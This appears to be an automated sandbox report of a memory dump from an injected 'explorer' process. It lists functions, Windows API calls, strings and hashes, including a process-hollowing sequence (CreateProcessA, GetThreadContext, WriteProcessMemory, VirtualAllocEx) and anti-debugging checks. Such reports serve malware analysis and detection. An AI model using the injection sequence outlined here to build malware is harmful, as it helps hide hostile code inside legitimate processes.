Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

Sleep.KERNELBASE ref: 02F009B5

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: 8315e5d16d0ba40dd3ccd7896b4b966131c1843e9f25ab0febd745bdbf857a1d
Instruction ID: 84cdbf6c4ecd9331ed1a9672bf352e0e1472eef329f1309465652c4ed18facf2
Opcode Fuzzy Hash: 8315e5d16d0ba40dd3ccd7896b4b966131c1843e9f25ab0febd745bdbf857a1d
Instruction Fuzzy Hash: 61F0F971E40644ABD7017B6CCD12B0DBBA9EB12BA0F84035CE912673D1DA7159144BD2

Non-executed Functions

Function 02F090DD Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 02F090E3
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02F090F1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02F09102
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02F09113
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02F09124
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02F09135
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 02F09146
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02F09157
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 02F09168
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02F09179
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02F0918A
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02F0919B
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02F091AC
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02F091BD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02F091CE
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02F091DF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02F091F0
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 02F09201
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 02F09212
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 02F09223
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 02F09234
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 02F09245
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 02F09256
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 02F09267
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 02F09278
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 02F09289
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 02F0929A
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 02F092AB
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 02F092BC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 02F092CD
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 02F092DE
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 02F092EF
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 02F09300
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 02F09311
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 02F09322
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 02F09333
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 02F09344
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 02F09355
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 02F09366
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 02F09377
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 02F09388

Strings

GetLocaleInfoEx, xrefs: 02F0936C
WaitForThreadpoolTimerCallbacks, xrefs: 02F091A1
FreeLibraryWhenCallbackReturns, xrefs: 02F09207
SleepConditionVariableSRW, xrefs: 02F09317
InitOnceExecuteOnce, xrefs: 02F0913B
CloseThreadpoolTimer, xrefs: 02F091B2
SleepConditionVariableCS, xrefs: 02F092C2
InitializeSRWLock, xrefs: 02F092D3
TryAcquireSRWLockExclusive, xrefs: 02F092F5
FlsSetValue, xrefs: 02F09119
WakeAllConditionVariable, xrefs: 02F092B1
WakeConditionVariable, xrefs: 02F092A0
FlsFree, xrefs: 02F090F7
FlsAlloc, xrefs: 02F090EB
CreateThreadpoolTimer, xrefs: 02F0917F
FlsGetValue, xrefs: 02F09108
CreateSemaphoreW, xrefs: 02F0915D
CompareStringEx, xrefs: 02F0935B
kernel32.dll, xrefs: 02F090DE
FlushProcessWriteBuffers, xrefs: 02F091F6
GetSystemTimePreciseAsFileTime, xrefs: 02F0927E
GetTickCount64, xrefs: 02F0924B
SetThreadpoolWait, xrefs: 02F091D4
SetThreadpoolTimer, xrefs: 02F09190
CreateEventExW, xrefs: 02F0914C
CloseThreadpoolWait, xrefs: 02F091E5
InitializeCriticalSectionEx, xrefs: 02F0912A
SubmitThreadpoolWork, xrefs: 02F09339
GetCurrentPackageId, xrefs: 02F0923A
CreateThreadpoolWait, xrefs: 02F091C3
ReleaseSRWLockExclusive, xrefs: 02F09306
CreateSymbolicLinkW, xrefs: 02F0922E
LCMapStringEx, xrefs: 02F0937D
CreateSemaphoreExW, xrefs: 02F0916E
GetFileInformationByHandleEx, xrefs: 02F0925C
AcquireSRWLockExclusive, xrefs: 02F092E4
CreateThreadpoolWork, xrefs: 02F09328
GetCurrentProcessorNumber, xrefs: 02F09218
CloseThreadpoolWork, xrefs: 02F0934A
InitializeConditionVariable, xrefs: 02F0928F
SetFileInformationByHandle, xrefs: 02F0926D

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 34005fcae3b879af743d0a14f598d3b06babd69057bdd394d2ea4251f60b1b15
Instruction ID: 49243c1102d4d30cafa994b03ce230bace9431aebe212df2b3f987e2862f0f25
Opcode Fuzzy Hash: 34005fcae3b879af743d0a14f598d3b06babd69057bdd394d2ea4251f60b1b15
Instruction Fuzzy Hash: 86611BB6DD1318ABEB016FB5AA0DD46FBE9BA1ABC13044D1BB306D6601DBF484218F54

Function 02F57E2D Relevance: 37.7, Strings: 18, Instructions: 15234COMMON

Download Yara Rule

Strings

`, xrefs: 02F60BF8
(, xrefs: 02F61500
(, xrefs: 02F6174E
(, xrefs: 02F62027
g, xrefs: 02F6310C
g, xrefs: 02F58077
*, xrefs: 02F60F65
(, xrefs: 02F6357F
8, xrefs: 02F59C78
>, xrefs: 02F5BE66
(, xrefs: 02F62935
\&, xrefs: 02F57E4F
*, xrefs: 02F60BE0
(, xrefs: 02F61A96
z, xrefs: 02F5E1EF
(, xrefs: 02F626F4
>, xrefs: 02F6582A
8, xrefs: 02F6428F

Memory Dump Source

Source File: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID: ($($($($($($($*$*$8$8$>$>$\&$`$g$g$z
API String ID: 0-3202205502
Opcode ID: caf5b17593d9491f9d731897474dabe55c1700c579e61b0b8f45ecac076660b4
Instruction ID: 2f070534edbe53a8d8c070330a919bad6f5bed8db96cf02cb815e114730be41f
Opcode Fuzzy Hash: caf5b17593d9491f9d731897474dabe55c1700c579e61b0b8f45ecac076660b4
Instruction Fuzzy Hash: 6274BCB5A083918FD364CF29C584A5AFBE2FBC9344F10892EEA99D7350D770A845CF52

Function 02EE8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02EE809D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02EE80FB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02EE8114
GetThreadContext.KERNEL32(?,00000000), ref: 02EE8129
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 02EE8149
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 02EE818B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 02EE81A8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 02EE8261

Strings

VUUU, xrefs: 02EE7F01
, xrefs: 02EE8140
invalid stoi argument, xrefs: 02EE8057

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 06e5d4e209caebb9b9f265a32ffb8971738e50e436ce72097c25e54563e6c0d4
Instruction ID: fcee502fb76fa629f376ac79e7e5b1bbb27b2d3b97719cd0d5bf822ad7021bfd
Opcode Fuzzy Hash: 06e5d4e209caebb9b9f265a32ffb8971738e50e436ce72097c25e54563e6c0d4
Instruction Fuzzy Hash: EB4150B1684705BFE7209F50DC05F56BBE9BF88B44F40481AF789E6190EBB0A914CB96

Function 02F21BC8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

GetACP.KERNEL32(?,?,?,?,?,?,02F14C29,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 02F21C89
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02F14C29,?,?,?,00000055,?,-00000050,?,?), ref: 02F21CB4
_wcschr.LIBVCRUNTIME ref: 02F21D48
_wcschr.LIBVCRUNTIME ref: 02F21D56
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 02F21E17

Strings

utf8, xrefs: 02F21D86

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 266755596ba82e2bc3186b615a22dc8b7bcdc5855fc4cb01d2048768d888ca88
Instruction ID: d96d6e311967a516f3df9162a9c1900d9ce8d22174891450da3ac7a819cc0bfc
Opcode Fuzzy Hash: 266755596ba82e2bc3186b615a22dc8b7bcdc5855fc4cb01d2048768d888ca88
Instruction Fuzzy Hash: F4711C36E40226AAE725EB34CC41BBB73A9EF467C0F504469E70ADB182EB70D549CB54

Function 02F22354 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,02F22672,00000002,00000000,?,?,?,02F22672,?,00000000), ref: 02F223ED
GetLocaleInfoW.KERNEL32(?,20001004,02F22672,00000002,00000000,?,?,?,02F22672,?,00000000), ref: 02F22416
GetACP.KERNEL32(?,?,02F22672,?,00000000), ref: 02F2242B

Strings

OCP, xrefs: 02F223A8
ACP, xrefs: 02F22372

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d6b741fa6070af93db9628dde2e089cb6c93f14c3969f6f58296b012203fd2f7
Instruction ID: 8067ee21aa4ce9f40101705c81f68e4b17a91af7a1636a6d5d7f4863415bcccd
Opcode Fuzzy Hash: d6b741fa6070af93db9628dde2e089cb6c93f14c3969f6f58296b012203fd2f7
Instruction Fuzzy Hash: F221C822F00125A6DB348F55CB44B9B73A7EF46AD4B968424EF09DB115EB32DE49C350

Function 02F22529 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 02F22635
IsValidCodePage.KERNEL32(00000000), ref: 02F2267E
IsValidLocale.KERNEL32(?,00000001), ref: 02F2268D
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 02F226D5
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 02F226F4

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: b4ffa0dbd95ead38abe898d2cf4186ae719837024cda07b20e1b0a3e89b03917
Instruction ID: 87fbafd2e3d2a2cd9dda7cb605cc0268b129f8c7f19f57ac78bc9fea59ce4b10
Opcode Fuzzy Hash: b4ffa0dbd95ead38abe898d2cf4186ae719837024cda07b20e1b0a3e89b03917
Instruction Fuzzy Hash: 28517472E00225ABEF20DFA5DC40BAFB7B9BF49784F444469EA14EB150E7709908CF61

Function 02F0A195 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 02F0A1A1
IsDebuggerPresent.KERNEL32 ref: 02F0A26D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F0A28D
UnhandledExceptionFilter.KERNEL32(?), ref: 02F0A297

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7ccecca0bc28423075382fe8ca17c058d30623cef87e2ddb4e736c8c5ab839c2
Instruction ID: 819560034bcbaab3a81acf1fbf8727fedcd8614c85ab6a242607cc7719371401
Opcode Fuzzy Hash: 7ccecca0bc28423075382fe8ca17c058d30623cef87e2ddb4e736c8c5ab839c2
Instruction Fuzzy Hash: 2D311A75D4131C9BDB10DFA4D9897CDBBB8BF08344F1041AAE50DA7290EB719A859F44

Function 02F21FDB Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F2202F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F22079
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F2213F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: f00360b93d99b0c81eb05462c7193dd91f7eebda12545904599a09c33181b73d
Instruction ID: af6f88ce1ff0135e9a0027de2ae4f0d6dd6cafdc53de0a3a24f3ab4378e808a0
Opcode Fuzzy Hash: f00360b93d99b0c81eb05462c7193dd91f7eebda12545904599a09c33181b73d
Instruction Fuzzy Hash: A861B171A401279FEB289F28CC82FBA77A9EF06380F104169EF15C6185EB74D999DF50

Function 02F0E87C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 02F0E974
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 02F0E97E
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 02F0E98B

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6ee862e6599d9ff1d53b2419f88ef819391ca1755f7e597b1448f4f7c6cfb98d
Instruction ID: e49638d7bd744c71f761b472d49013b5db5ff912c18034bddb2e1583f9e1aaa4
Opcode Fuzzy Hash: 6ee862e6599d9ff1d53b2419f88ef819391ca1755f7e597b1448f4f7c6cfb98d
Instruction Fuzzy Hash: 1631E674D0121C9BCB21DF68DC8879CBBB8BF08350F5045EAE50CA7290EB709B859F44

Function 02F0A37F Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02F0A395

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7ca06757c54b0b729f209633600df473d32437bb5ff69c26bc74e3a86a08a731
Instruction ID: b7f7b27f988a0589a69d6de5a83145711702b2637e0a308f4a7254b1c78556f7
Opcode Fuzzy Hash: 7ca06757c54b0b729f209633600df473d32437bb5ff69c26bc74e3a86a08a731
Instruction Fuzzy Hash: D6516EB9E01309CBEB15CF55D9C57AEBBF0FB54398F14882ADA05EB281D3B49950CB90

Function 02F1ED13 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f7489a2aef375b30714f1ca6f9ddac13144c9b910b856f4337eeeb20c2f020
Instruction ID: 37994d1afe21b4e337cf4aef50fb66a262c45ad2803755f1633673deaa6d304d
Opcode Fuzzy Hash: a2f7489a2aef375b30714f1ca6f9ddac13144c9b910b856f4337eeeb20c2f020
Instruction Fuzzy Hash: FC41A0B1C0421DAFDB24DF69CC88AEABBB9EF45340F5442D9E95DD3240DA359E848F10

Function 02F2222E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02F16820: GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
Part of subcall function 02F16820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

Part of subcall function 02F16820: _free.LIBCMT ref: 02F16882
Part of subcall function 02F16820: _free.LIBCMT ref: 02F168B8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02F22282

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
